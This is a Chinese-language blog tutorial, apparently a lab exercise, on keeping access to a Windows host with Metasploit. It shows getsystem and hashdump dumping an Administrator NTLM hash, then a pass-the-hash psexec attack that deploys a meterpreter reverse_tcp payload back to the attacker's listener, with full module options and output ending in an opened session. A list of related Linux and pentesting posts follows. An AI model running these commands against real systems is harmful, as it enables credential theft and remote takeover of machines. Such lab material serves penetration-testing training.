kali linux权限维持,msfconsole权限维持

获取管理员hash

获得shell后，执行命令getsystem

提高权限为管理员权限，接着执行命令run post/windows/gather/hashdump

获取hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::

权限维持

执行命令use exploit/windows/smb/psexec

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.232.129

set LPORT 443

set RHOST 192.168.232.204

set SMBUser Administrator

show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.232.204 yes The target address

RPORT 445 yes The SMB service port (TCP)

SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing

SERVICE_DISPLAY_NAME no The service display name

SERVICE_NAME no The service name

SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

SMBDomain . no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser Administrator no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.232.129 yes The listen address (an interface may be specified)

LPORT 443 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e

SMBPass => aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e

msf exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.232.129:443

[*] 192.168.232.204:445 - Connecting to the server...

[*] 192.168.232.204:445 - Authenticating to 192.168.232.204:445 as user 'Administrator'...

[*] 192.168.232.204:445 - Selecting PowerShell target

[*] 192.168.232.204:445 - Executing the payload...

[+] 192.168.232.204:445 - Service start timed out, OK if running a command or non-service executable...

[*] Sending stage (179779 bytes) to 192.168.232.204

[*] Meterpreter session 1 opened (192.168.232.129:443 -> 192.168.232.204:5231) at 2018-07-03 19:26:26 +0800

meterpreter >

成功得到反弹

版权属于：逍遥子大表哥

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

kali linux权限维持,msfconsole权限维持相关推荐

手机免root安装kali linux 步骤，离线版（最终可行版）
手机免root安装kali linux 步骤下载termux可以通过 F-Droid跳过google play,注意有点老安卓手机不行,比如我的三星i9152,下载f-driod之后显示不兼容,终于 ...
Kali Linux 秘籍第七章权限提升
第七章权限提升作者:Willie L. Pritchett, David De Smet 译者:飞龙协议:CC BY-NC-SA 4.0 简介我们已经获得了想要攻击的计算机的权限.于是将权限尽 ...
Kali渗透测试之六提升权限
◆提升权限:获取目标系统的控制权是渗透成功的标志.审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统级权限 ...
【Linux系统】第10节 linux系统文件及目录权限详解
目录 1 权限 1.1 权限的查看 1.2 权限解读 2 权限修改 2.1 修改文件/目录普通权限 2.1.1 方法1:指定权限修改 2.1.2 方法2:八进制赋权法 2.2 修改文件所属信息 2.3 ...
Linux之获取管理员权限的相关命令
Linux之获取管理员权限的相关命令 1. sudo命令的使用命令说明 sudo -s 切换到root用户,获取管理员权限 sudo 某个命令的执行需要获取管理员权限可以在执行命令前面加上sudo ...
深入理解Linux中的文件权限
Linux中文件权限 Linux中每个文件都有一个特定的拥有者(一般是创建它的用户)和所属用户组,这是它的固有属性.文件可以利用这两个固有属性来规定它的拥有者或者是所属用户组内的用户是否拥有对它的访问 ...
Linux系统文件安全与权限
上篇文章详细介绍了通过文件压缩程序和归档程序,从而掌握在linux系统中如何归档和备份数据.那么,今天,这篇文章还是回到linux的基础知识体系中,今天主要围绕linux系统中的权限展开描述. 综所周 ...
Linux绝对权限和相对权限法,Linux基础学习笔记
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选? 学习计划里有一些关于Linux的知识,所以今后一段时间用来学习Linux的基础知识和服务器架设知识,平时一直在用,但是一 ...
Linux sticky bit 目录权限 rwt权限
[linux权限分为 user group others三组] 今天看到有个目录的权限是rwxrwxrwt 很惊讶这个t是什么,怎么不是x或者-呢?搜了下发现: 这个t代表是所谓的sticky bit ...
【Linux】文件特殊权限 SUID/SGID/Sticky Bit
linux中除了常见的读(r).写(w).执行(x)权限以外,还有3个特殊的权限,分别是setuid.setgid和stick bit 1.setuid.setgid 先看个实例,查看你的/usr/b ...

kali linux权限维持,msfconsole权限维持

kali linux权限维持,msfconsole权限维持相关推荐

最新文章

热门文章